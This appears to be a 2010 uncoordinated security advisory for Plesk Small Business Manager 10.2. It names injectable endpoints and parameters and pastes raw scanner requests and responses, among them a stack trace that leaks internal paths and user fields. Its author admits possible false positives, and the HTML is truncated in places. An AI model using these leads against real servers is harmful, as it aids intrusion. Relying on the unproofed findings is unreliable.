######################################################################## # Vendor: Plesk Small Business Manager 10.2 + Site Editor # Product Description URL http://www.parallels.com/products/small-business-panel/ # Date: 2010-09-17 # Author : Hoyt LLC – http://cloudscan.me # Contact : h02332@gmail.com # Home : http://cloudscan.me # Bug : Cross Site Scripting + SQL Injection # Tested on : Plesk Small Business Manager 10.2.0 // Windows 2008 /64/R2 # Disclosure : Uncoordinated # CVE ID's : CVE-2011-4763 -> 4768 ########################################################################Incoming links from Secunia 41765 and another incoming link from OSVDB 68624 and OSVDB 68623 and EDB 15313. NOTE - THIS REPORT MAY CONTAIN FALSE POSITIVES THAT HAVE NOT BEEN PROOFED Target = Plesk Small Business Manager 10.2.0 - Site Editor
1. SQL injection - CVE-2011-4763
1.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html [currentPageId parameter]
1.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish [Referer HTTP header]
2. Cross-site scripting (reflected) - CVE-2011-4764
2.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [file parameter]
3. Cookie without HttpOnly flag set - CVE-2011-4765
3.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/
3.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Login
3.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/NoCookies
3.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/UnsupportedBrowser
3.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/
3.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design
3.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit
3.8. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/
3.9. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html
3.10. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image
3.11. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
3.12. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/
3.13. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add
3.14. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit
3.15. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Image/Edit
3.16. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/ImageUpload
3.18. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Overview
3.19. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Pages
3.20. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish
3.21. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Start
3.22. http://vulnerarable.plesk.smb.10.2.0.site:2006/custom/
3.23. http://vulnerarable.plesk.smb.10.2.0.site:2006/external_login.php
4. Source code disclosure - CVE-2011-4766
6.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design
6.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add
6.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit
7. Email addresses disclosed - CVE-2011-4767
7.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image
7.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/SiteFamilies.js
7.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/Wizard/Status.js
7.4. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/controls.js
7.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/dragdrop.js
7.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php
7.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/BlockModule.js
9. HTML does not specify charset - CVE-2011-4768
9.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image
9.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/blank.html
9.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php
Severity: | High |
Confidence: | Tentative |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/Edit/Html |
GET /Wizard/Edit/Html Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: PHPSESSID=1032116979 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 21:34:36 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
GET /Wizard/Edit/Html Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: PHPSESSID=1032116979 |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: /Login Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 21:34:37 GMT Connection: close |
Severity: | High |
Confidence: | Tentative |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/Edit/Modules |
GET /Wizard/Edit/Modules Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 22:10:30 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
GET /Wizard/Edit/Modules Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: /Login Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 22:10:35 GMT Connection: close |
Severity: | High |
Confidence: | Tentative |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/Edit/Modules |
GET /Wizard/Edit/Modules Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 21:42:02 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
GET /Wizard/Edit/Modules Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: /Login Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 21:42:06 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/Publish |
GET /Wizard/Publish HTTP/1.1 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Tue, 12 Oct 2010 01:35:24 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
Severity: | High |
Confidence: | Tentative |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /sites/78/78806f0057 |
GET /sites/78/78806f0057 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d9f3512785 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=23074cb14e P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:11:28 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
GET /sites/78/78806f0057 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d9f3512785 |
HTTP/1.1 200 OK Content-Type: text/css Last-Modified: Sun, 10 Oct 2010 06:11:26 GMT Accept-Ranges: bytes ETag: "03b69f84168cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:11:29 GMT Content-Length: 1696 /* content */ .text-header { font-weight: bold; font-size: 12pt; font-family: "Arial Narrow", Arial, sans-serif; color: #000000; } .pageContent { font-size: 8pt; font-family: Tahoma, sans-serif; color: #7C7C7C; } .pageContent a { font-size: 8pt; font-family: Tahoma, sans-serif; color: #8D8D8D; } /* top elements */ .company { font-weight: bold; font-size: 14pt; font-family: "Arial Narrow", Arial, sans-serif; color: #FFFFFF; font-style: normal; text-transform: capitalize; } .slogan { font-weight: bold; font-size: 8pt; font-family: "Arial Narrow", Arial, sans-serif; color: #FFFFFF; font-style: normal; text-transform: uppercase; } /*main menu*/ .menu { font-size: 8pt; font-family: Tahoma, sans-serif; color: #DFDFDF; text-decoration: none; font-weight: bold; } .amenu { font-size: 8pt; font-family: Tahoma, sans-serif; color: #9CE300; font-weight: bold; } /*submenu*/ .submenu { font-size: 8pt; font-family: Tahoma, sans-serif; color: #4B4B4B; text-decoration: none; font-weight: bold; } .asubmenu { font-size: 8pt; font-family: Tahoma, sans-serif; color: #4B4B4B; text-decoration: underline; font-weight: bold; } /*bottom menu*/ .bmenu { font-size: 8pt; font-family: Tahoma, sans-serif; color: #4B4B4B; text-decoration: none; font-weight: bold; } .abmenu { font-size: 8pt; font-family: Tahoma, sans-serif; color: #4B4B4B; text-decoration: underline; font-weight: bold; } /*copyright*/ .footer { font-size: 8pt; font-family: Tahoma, sans-serif; color: #3F3F3F; } /*backgrounds*/ .main-bg { background-color: #E1E1E1; } .submenu-bg { background-color: #4E8BC1; } .menu-hr { background-color: #6BA4CF; } .line { background-color: #CACACA; } |
Severity: | High |
Confidence: | Tentative |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /sites/78/78806f0057 |
GET /sites/78/78806f0057 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d9f3512785 |
HTTP/1.1 500 Internal Server Error Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:07:49 GMT Content-Length: 1208 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
GET /sites/78/78806f0057 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d9f3512785 |
HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Sun, 10 Oct 2010 06:07:53 GMT Accept-Ranges: bytes ETag: W/"80274794168cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:07:55 GMT Content-Length: 2060 GIF89aL.8...............f .........4....]8.K......e q.N<.p..=..C!B...UZk...B. |
Severity: | High |
Confidence: | Tentative |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /sites/78/78806f0057 |
GET /sites/78/78806f0057 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d9f3512785 |
HTTP/1.1 403 Forbidden Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=23074cb14e P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:11:50 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size: fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin h2{font-size:1.7em;margin h3{font-size:1.2em;margin #header{width:96%;margin background-color:#555555; #content{margin:0 0 0 2%;position:relative;} .content-container --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container" <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> <h1>403 - Forbidden</h1> |
GET /sites/78/78806f0057 Host: vulnerarable.plesk.smb.10.2.0.site:2006 Proxy-Connection: keep-alive Referer: http://vulnerarable.plesk.smb.10.2.0.site Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d9f3512785 |
HTTP/1.1 200 OK Content-Type: image/jpeg Last-Modified: Sun, 10 Oct 2010 06:11:53 GMT Accept-Ranges: bytes ETag: "801a8184268cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 10 Oct 2010 06:11:56 GMT Content-Length: 621 ......JFIF.....d.d..... ...................... .. . .......................... d}..v.(...|....#.s~..!Z. '\.../b...[..|%dz......+, |
Severity: | High |
Confidence: | Certain |
Host: | http://vulnerarable.plesk.smb.10.2.0.site |
Path: | /Wizard/Edit/Modules |
GET /Wizard/Edit/Modules Host: vulnerarable.plesk.smb.10.2.0.site:2006 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://vulnerarable.plesk.smb.10.2.0.site Cookie: PLESKSESSID=d9f35127 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 Set-Cookie: SessionID=42b54cb11f P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" X-Powered-By: ASP.NET Date: Mon, 11 Oct 2010 21:51:59 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Internal Sitebuilder error</title> <style type="text/css"> td, .text { font-family: Verdana; font-size: 11px; } #stackTrace { background: #EEEEEE; width: 100%; position: absolute; left: 0px; top: 0px; filter: alpha(opacity=80); -moz-opacity: 0.8; opacity: 0.8; } #showStackTrace { position: absolute; left: 0px; top: 0px; } </style> </head> <body> <table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td width="100%" height="100%" align="center" valign="middle"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td width="60" rowspan="2" valign="top"> <img src="/images/unsupported </td> <td valign="middle" height="40" style="background: #EEEEEE; color: #606060;"> <center><b>Internal Sitebuilder error.</b></center> File: C:\Program Files (x86)\Parallels\Plesk <td width="7"><img src="/images/unsupported </tr> <tr> <td colspan="2" style="padding-top: 10px;"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td> <a href="#" onclick="javascript: history.back();"><b>Go back</b></a> </td> <td align="right"> <a href="mailto:bugreport </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> <div id="showStackTrace"><a class="text" style="color: #F0F0F0; text-decoration: none;" href="#" onclick="document <div id="stackTrace" class="text" style="display: none;" onclick="document <pre><b>Stack trace:</b> Array ( [0] => Array ( [function] => SB_ExceptionHandler [args] => Array ( [0] => Base_SyntaxException Object ( [message:protected] => PHP Notice : Trying to get property of non-object [string:private] => [code:protected] => 8 [file:protected] => C:\Program Files (x86)\Parallels\Plesk [line:protected] => 276 [trace:private] => Array ( [0] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 48 [function] => handleError [class] => Base_SyntaxException [type] => :: ) [1] => Array ( [file] => C:\Program Files (x86)\Parallels\Plesk [line] => 276 [function] => handleError [class] => Base_SyntaxException [type] => :: [args] => Array ( [0] => 8 [1] => Trying to get property of non-object [2] => C:\Program Files (x86)\Parallels\Plesk [3] => 276 [4] => Array ( [user] => SB_ORM_User Object ( [_isPasswordModified [validatorFailList [_data:protected] => Array ( [id] => 2 [parent_id] => 1 [plan_id] => 0 [role_id] => 4 [user_settings_id] => 2 [user_name] => admin_Guest [user_password] => [email] => [first_name] => [last_name] => [creation_date] => 2010-09-30T21:32:42-05:00 [auth_cookie] => [must_migrate] => 0 [uuid] => f7eca701-2829-833f-7d5d [password_algo] => 0 [password_salt] => ) [_rRepository:protected] => Base_ORM_RelationRep ( [_relations:private] => Array ( [settings] => Base_ORM_Relation Object ( [_name:private] => settings [_type:private] => 1 [_className:private] => SB_ORM_UserSettings [_parentField:private] => user_settings_id [_childField:private] => id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [parentUser] => Base_ORM_Relation Object ( [_name:private] => parentUser [_type:private] => 1 [_className:private] => SB_ORM_User [_parentField:private] => parent_id [_childField:private] => id [_cascade:private] => [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [role] => Base_ORM_Relation Object ( [_name:private] => role [_type:private] => 3 [_className:private] => SB_ORM_Role [_parentField:private] => role_id [_childField:private] => id [_cascade:private] => [_setNull:private] => [_arrayClassName:private] => [_value:private] => SB_ORM_Role Object ( [validatorFailList [_data:protected] => Array ( [id] => 4 [name] => Guest ) [_rRepository:protected] => Base_ORM_RelationRep ( [_relations:private] => Array ( ) ) [_isModified:protected] => [_isNew:protected] => ) [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [plan] => Base_ORM_Relation Object ( [_name:private] => plan [_type:private] => 3 [_className:private] => SB_ORM_Plan [_parentField:private] => plan_id [_childField:private] => id [_cascade:private] => [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [childReferences] => Base_ORM_Relation Object ( [_name:private] => childReferences [_type:private] => 2 [_className:private] => SB_ORM_UserReference [_parentField:private] => id [_childField:private] => parent_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [parentReferences] => Base_ORM_Relation Object ( [_name:private] => parentReferences [_type:private] => 1 [_className:private] => SB_ORM_UserReference [_parentField:private] => id [_childField:private] => child_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [children] => Base_ORM_Relation Object ( [_name:private] => children [_type:private] => 2 [_className:private] => SB_ORM_User [_parentField:private] => id [_childField:private] => parent_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownSites] => Base_ORM_Relation Object ( [_name:private] => ownSites [_type:private] => 2 [_className:private] => SB_Site [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownHosts] => Base_ORM_Relation Object ( [_name:private] => ownHosts [_type:private] => 2 [_className:private] => SB_ORM_Host [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) [ownPlans] => Base_ORM_Relation Object ( [_name:private] => ownPlans [_type:private] => 2 [_className:private] => SB_ORM_Plan [_parentField:private] => id [_childField:private] => user_id [_cascade:private] => 1 [_setNull:private] => [_arrayClassName:private] => [_value:private] => [_orderFieldName:private] => [_default:private] => Array ( [field] => [value] => ) ) 